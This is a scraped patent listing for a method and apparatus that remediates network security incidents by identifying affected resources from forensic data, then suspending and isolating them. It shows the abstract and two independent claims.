SYSTEM AND METHOD FOR REAL-TIME REMEDIATION RESPECTIVE OF SECURITY INCIDENTS
First Claim
Patent Images
1. A method of remediating at least one security incident in a computer network, comprising:
- identifying, by a computer, said at least one security incident in the computer network based on forensic data;
identifying, by the computer, at least one resource affected by the security incident based on the identified security incident;
suspending the at least one identified resource; and
storing the identified at least one resource in a separate memory that is not connected to the computer network.
2 Assignments
0 Petitions
Accused Products
Abstract
A system, an apparatus, and a method thereof identifies at least one security threat in an enterprise'"'"'s network. The system characterizes sources affected by the security threat within the enterprise'"'"'s network. The identification of the sources affected by the security threat is made based on the forensic data extracted by the system. The system then suspends the affected sources. The system also stores the affected sources in a separate memory to prevent execution thereof.
16 Citations
20 Claims
-
1. A method of remediating at least one security incident in a computer network, comprising:
-
identifying, by a computer, said at least one security incident in the computer network based on forensic data; identifying, by the computer, at least one resource affected by the security incident based on the identified security incident; suspending the at least one identified resource; and storing the identified at least one resource in a separate memory that is not connected to the computer network. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10, 11)
-
-
12. An apparatus of remediating at least one security incident in a computer network, comprising:
-
a memory configured to store computer-executable instructions; a processor configured to execute the stored instructions, which when executed configure the processor to; identify said at least one security incident in the computer network based on forensic data; identify at least one resource affected by the security incident based on the identified security incident; suspend the at least one identified resource; and store the identified at least one resource in a separate memory that is not connected to the computer network. - View Dependent Claims (13, 14, 15, 16, 17, 18, 19, 20)
-
Specification